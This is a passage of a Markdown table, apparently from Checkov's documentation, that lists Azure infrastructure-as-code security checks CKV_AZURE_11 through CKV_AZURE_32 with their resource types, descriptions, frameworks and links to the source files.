is restricted from the internet | Terraform | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleSSHAccessRestricted.py) | +| 1557 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | +| 1558 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Bicep | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | +| 1559 | CKV_AZURE_11 | resource | azurerm_mariadb_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1560 | CKV_AZURE_11 | resource | azurerm_mysql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1561 | CKV_AZURE_11 | resource | azurerm_postgresql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1562 | CKV_AZURE_11 | resource | azurerm_sql_firewall_rule | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | Terraform | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py) | +| 1563 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that 
Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1564 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1565 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1566 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1567 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1568 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1569 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater 
than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1570 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Bicep | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 1571 | CKV_AZURE_12 | resource | azurerm_network_watcher_flow_log | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | Terraform | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkWatcherFlowLogPeriod.py) | +| 1572 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1573 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1574 | CKV_AZURE_13 | resource | azurerm_app_service | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1575 | CKV_AZURE_13 | resource | azurerm_linux_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1576 | CKV_AZURE_13 | resource | 
azurerm_windows_web_app | Ensure App Service Authentication is set on Azure App Service | Terraform | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAuthentication.py) | +| 1577 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1578 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | Bicep | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 1579 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 1580 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Bicep | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | +| 1581 | CKV_AZURE_14 | resource | azurerm_app_service | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1582 | CKV_AZURE_14 | resource | azurerm_linux_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1583 | CKV_AZURE_14 | resource | azurerm_windows_web_app | Ensure web app redirects all HTTP traffic to HTTPS in Azure App 
Service | Terraform | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py) | +| 1584 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 1585 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | Bicep | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | +| 1586 | CKV_AZURE_15 | resource | azurerm_app_service | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1587 | CKV_AZURE_15 | resource | azurerm_linux_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1588 | CKV_AZURE_15 | resource | azurerm_windows_web_app | Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1589 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 1590 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | 
[AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 1591 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1592 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1593 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1594 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 1595 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 1596 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1597 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming 
client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1598 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1599 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 1600 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 1601 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1602 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1603 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1604 | CKV_AZURE_19 | resource | 
Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 1605 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 1606 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | +| 1607 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 1608 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 1609 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | +| 1610 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 1611 | CKV_AZURE_21 | resource 
| Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 1612 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | +| 1613 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 1614 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 1615 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | +| 1616 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 1617 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | 
[SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1618 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1619 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 1620 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1621 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1622 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1623 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1624 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL 
servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1625 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | +| 1626 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | +| 1627 | CKV_AZURE_24 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | +| 1628 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1629 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1630 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | 
[SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1631 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | arm | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | +| 1632 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | +| 1633 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) | +| 1634 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | +| 1635 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | +| 1636 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) | +| 1637 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure 
that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1638 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1639 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1640 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | +| 1641 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | +| 1642 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) | +| 1643 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database 
Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1644 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1645 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1646 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1647 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1648 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1649 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set 
to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1650 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1651 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1652 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1653 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) | +| 1654 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1655 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for 
PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1656 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1657 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1658 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | 